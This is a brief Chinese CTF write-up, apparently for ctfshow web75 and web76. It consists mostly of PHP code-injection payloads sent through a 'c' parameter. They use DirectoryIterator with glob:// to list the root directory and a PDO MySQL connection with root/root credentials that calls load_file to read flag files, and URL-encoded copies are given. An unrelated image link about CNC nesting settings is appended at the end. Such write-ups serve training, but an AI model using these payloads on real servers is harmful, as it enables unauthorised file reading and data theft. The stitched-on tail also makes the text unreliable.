web75
c=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString()." ");}exit();
bin dev etc flag36.txt home lib media mnt opt proc root run sbin srv sys tmp usr var
c=require("/flag36.txt");exit();
好 报错了,看来不能⽤require了,我去试试include。
好 还是不能 看hint,发现使用数据库 看了南神博客,好mysql拿flag看不懂,爬,拿个payload就爬
c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');foreach($dbh->query('select load_file("/flag36.txt")') as $row) {echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0);
同样要url编码
c=try%20%7B$dbh%20=%20new%20PDO('mysql:host=localhost;dbname=ctftraining',%20'root','root');foreach($dbh-%3Equery('select%20load_file(%22/flag36.txt%22)')%20as%20$row)%7Becho($row%5B0%5D).%22%7C%22;%20%7D$dbh%20=%20null;%7Dcatch%20(PDOException%20$e)%20%7Becho%20$e-%3EgetMessage();exit(0);%7Dexit(0);
c=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString()." ");}exit();
题目提示:
c=?><?php $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().'');}exit(0);?>
#通过payload扫描 flag36.txt
c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');foreach($dbh->query('select load_file("/flag36.txt")') as $row) {echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0);
web76
c=?><?php $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().'');}exit(0);?>
#通过payload扫描 flag36d.txt
c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');foreach($dbh->query('select load_file("/flag36d.txt")') as $row) {echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0); c=try%20%7B$dbh%20=%20new%20PDO('mysql:host=localhost;dbname=ctftraining',%20'root','root');foreach($dbh-%3Equery('select%20load_file(%22/flag36d.txt%22)')%20as%20$row)%7Becho($row%5B0%5D).%22%7C%22;%20%7D$dbh%20=%20null;%7Dcatch%20(PDOException%20$e)%20%7Becho%20$e-%3EgetMessage();exit(0);%7Dexit(0);
![[WSNesting 设置说明] 数控钻加工限制-不使用加工限制-自动连线](https://img2024.cnblogs.com/blog/683006/202503/683006-20250315182403163-348971063.png)
